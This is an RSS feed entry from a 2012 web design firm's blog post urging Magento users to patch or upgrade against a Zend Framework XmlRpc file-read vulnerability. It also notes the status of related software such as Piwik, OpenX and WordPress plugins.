		<link>http://www.whitefirdesign.com/blog/2012/07/06/make-sure-to-protect-against-serious-security-vulnerability-in-magento/</link>
		<comments>http://www.whitefirdesign.com/blog/2012/07/06/make-sure-to-protect-against-serious-security-vulnerability-in-magento/#comments</comments>
		<pubDate>Fri, 06 Jul 2012 17:07:32 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Magento]]></category>
		<category><![CDATA[Website Security]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/blog/?p=1493</guid>
		<description><![CDATA[Yesterday, Magento released an announcement on a serious security vulnerability in previous versions of Magento that &#8220;potentially allows an attacker to read any file on the web server&#8221; that &#8220;might include password files, configuration files, and possibly even databases if &#8230; <a href="http://www.whitefirdesign.com/blog/2012/07/06/make-sure-to-protect-against-serious-security-vulnerability-in-magento/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>Yesterday, Magento <a href="http://www.magentocommerce.com/blog/important-security-update-zend-platform-vulnerability/">released an announcement</a> on a serious security vulnerability in previous versions of Magento that &#8220;potentially allows an attacker to read any file on the web server&#8221; that &#8220;might include password files, configuration files, and possibly even databases if they are stored on the same machine as the Magento web server&#8221;. The vulnerability is due to a vulnerability in the XmlRpc component of the Zend Framework, which was <a href="http://framework.zend.com/security/advisory/ZF2012-01">announced last week</a>. The details of the vulnerability can be found in the <a href="https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt">advisory by SEC Consult</a>.</p>
<p>Magento has provided <a href="http://www.magentocommerce.com/blog/important-security-update-zend-platform-vulnerability/">several solutions</a> for protecting against this vulnerability. There is a workaround, patch files for older version of Magento, and a new release, 1.7.0.2, which is secured against the vulnerability. The workaround and patch files will resolve this issue for Magneto installations still running on outdated versions, but we would recommend, as always, that you upgrade to the latest version of software you run (the previous release, 1.7.0.1, fixed <a href="http://www.magentocommerce.com/blog/magento-community-edition-1701-released/">&#8220;some potential security vulnerabilities&#8221;</a> according to Magento).</p>
<p>If you use any software that has the Zend Framework you should check to for an update or announcement from the developers on the status of the vulnerability in the software. <a href="http://piwik.org/blog/2012/06/piwik-response-to-zf2012-01-security-advisory/">Piwik announced last week</a> that the current version of Piwik is not vulnerable as &#8220;Piwik neither uses nor includes the XmlRpc component from Zend Framework&#8221;. OpenX does contain the XmlRpc competent and uses it, we didn&#8217;t check if their use is vulnerable but we did inform them of the vulnerability (we would strongly recommend strongly recommend against using anything from OpenX as they continue to have an atrocious security record). There are several WordPress plugins which contain the vulnerable component and we have informed the WordPress.org Plugin Directory maintainers of the vulnerability so they can take appropriate action.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2012/07/06/make-sure-to-protect-against-serious-security-vulnerability-in-magento/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
	</channel>
</rss>
